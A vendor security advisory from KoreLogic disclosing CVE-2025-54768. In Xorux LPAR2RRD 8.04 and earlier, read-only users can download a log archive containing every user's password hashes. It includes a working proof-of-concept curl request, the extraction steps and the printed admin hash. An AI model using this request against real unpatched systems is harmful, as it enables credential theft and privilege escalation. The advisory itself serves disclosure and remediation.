Skip to main content
Security Advisory

Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information

Advisory ID
KL-001-2025-015
CVE ID
CVE-2025-54768
Published
2025-07-28
Vendor
Xorux

Affected Systems

Product
LPAR2RRD
Version
8.04 and prior
Platform
Rocky Linux 8.10

Discovered By

Jim Becher (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Xorux
Affected Product: LPAR2RRD
Affected Version: 8.04 and prior
Platform: Rocky Linux 8.10
CWE Classification: CWE-648: Incorrect Use of Privileged APIs, CWE-532: Insertion of Sensitive Information into Log File
CVE ID: CVE-2025-54768

Vulnerability Description

An API endpoint that should be limited to web application administrators is hidden from, but accessible by, lower-level read only web application users. The endpoint can be used to download logs from the appliance configuration, exposing sensitive information.

Technical Description

A read-only user can access a web application endpoint by which logs are downloaded. The logs are in tar.gz format, and can be extracted to reveal sensitive information that a read-only user should not be privileged to view. These files include password hashes for all users within the Xormon Original web application. An authenticated, read-only attacker could leverage this vulnerability to obtain and attempt to crack password hashes for more privileged users, including the admin user.

Mitigation and Remediation Recommendation

Xorux released version 8.05, which includes a remediation for this vulnerability. See https://lpar2rrd.com/note800.php.

Credit

This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

Proof of Concept

    $ curl -kq --ignore-content-length -H "Authorization: Basic amJlY2hlcjpqYmVjaGVy" 'https://172.31.255.207/lpar2rrd-cgi/vmwcfg.sh?cmd=logs' -o logs-ignore.tar.gz
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
    100  815k    0  815k    0     0   153k      0 --:--:--  0:00:05 --:--:--     0

    $ ls -al logs-ignore.tar.gz
    -rw-rw-r-- 1 jbecher jbecher 835419 May 29 13:55 logs-ignore.tar.gz

    $ tar tvf logs-ignore.tar | egrep 'htusers.cfg|users.json'
    -rw-rw-rw- lpar2rrd/lpar2rrd      90 2025-04-02 16:19 etc/web_config/htusers.cfg
    -rw-rw-rw- lpar2rrd/lpar2rrd    1377 2025-04-02 16:19 etc/web_config/users.json
    ...

    $ tar xf logs-ignore.tar etc/web_config/htusers.cfg

    $ tar xf logs-ignore.tar etc/web_config/users.json

    $ cat etc/web_config/htusers.cfg
    admin:$apr1$CSoXefyw$wGe9K7Ld5ClOEozE4zC.T1
    jbecher:$apr1$gQ7dWXiz$g.m4JR/qNdJl.y0cg7NCb/
    $ more etc/web_config/users.json
    {
       "ACLimported" : false,
       "groups" : {
          "admins" : {
             "ACL" : {
                "vms" : {},
                "cgroups" : [
                   "*"
                ],
                "pools" : {},
                "solo" : {},
                "lpars" : {}
             },
             "description" : "LPAR2RRD Administrators"
          },
          "ReadOnly" : {
             "description" : "Member can see everything but nothing can change."
          }
       },
       "users" : {
          "admin" : {
             "last_login" : "",
             "config" : {
                "db_width" : 120,
                "timezone" : "",
                "db_height" : 50,
                "db_items" : [],
                "locale" : "en-US",
                "menu_width" : 150
             },
             "updated" : "2022-03-28T13:47:11Z",
             "groups" : [
                "admins"
             ],
             "email" : "",
             "active" : 1,
             "created" : "2022-03-28T13:47:11Z",
             "name" : "LPAR2RRD Administrator",
             "htpassword" : "$apr1$CSoXefyw$wGe9K7Ld5ClOEozE4zC.T1"
          },
          "jbecher" : {
             "active" : true,
             "config" : {
                "timezone" : null
             },
             "email" : "jbecher@korelogic.com",
             "groups" : [
                "ReadOnly"
             ],
             "htpassword" : "$apr1$gQ7dWXiz$g.m4JR/qNdJl.y0cg7NCb/",
             "created" : "2025-04-02T20:18:59Z",
             "name" : "Jim Becher"
          }
       }
    }

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

KoreLogic requests point-of-contact to securely report several vulnerabilities to Xorux.

Vendor provides support@xorux.com as the point-of-contact, noting that they do not use PGP.

KoreLogic submits this vulnerability and four additional discoveries to Xorux.

Vendor acknowledges receipt, stating that the issue has been remediated and a new version of the affected product will be available 2025-07-25.

Xorux publishes updated version of the affected product.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt